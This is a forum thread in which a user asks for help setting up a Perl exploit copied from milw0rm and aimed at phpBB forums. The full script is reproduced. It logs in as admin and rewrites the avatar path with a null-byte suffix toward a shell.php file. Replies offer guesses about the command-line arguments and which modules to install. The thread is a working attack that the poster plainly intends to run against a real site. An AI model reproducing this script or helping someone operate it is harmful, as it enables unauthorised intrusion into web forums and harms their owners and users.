Some help with Perl Script

[insomaniacal]

So, I found this exploit written in Perl, and having very little knowledge with Perl (Okay, none), I'm having some trouble setting it up. Could any of you know look at this and tell me which parts would have to be filled in, and with what. Here is the exploit:

Code: Select all

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}


<-- If you're wondering, I got it from here --> http://milw0rm.org/exploits/2348

I know that I should fill in the $url with the target website, the username and password with that (a username/password). However, several lines, like "&login=1" confuse me. Do I need to do edit this in some way. If I do what I already stated, I get this output in the terminal.

Code: Select all

USE:
./phpbb.pl [websitenameremoved]/forum/ admin pass images/avatars/shell.php [d(DEBUG)]


This happens to be the first line of code that is executed, so is there anything to edit here? I'm quite new to remote exploits like this one, so I'd appreciate some help. Thanks !

[BhaaL]

Exploits from milw0rm are usually ready-to-use.
If you fail to read the instructions, you're better off not using them at all.

[insomaniacal]

I've read the instructions there, which are really nonexistent, they only tell you what the script is capable of doing, and I already knew about that.

Any other help? I haven't really been "at it" lately since I just recently got internet (the hotel I'm at had some hardware failure, or so they say, the past two days). Any thoughts, random ideas, or places to look would be helpful.

[fashizzlepop]

From a first quick look I'm thinking you have to have an account under a phpBB forum system and when you do, you will run the script as so:

Code: Select all

perl exploit.plx phpBBbasedforums.com username password

I'm thinking there is supposed to be a 4th argument to add in after password but I'm not sure what it is or if it is needed.

This could be completely wrong. For the record, you will need perl installed along with the modules listed at the top like: HTTP::Cookies, LWP, and URI::Escape

Code: Select all

cpan HTTP:Cookies

Disclaimer, I am very new to Perl and really am only guessing at this, and for all I know those modules might be already installed in a normal installation of Perl. Let me know how it goes.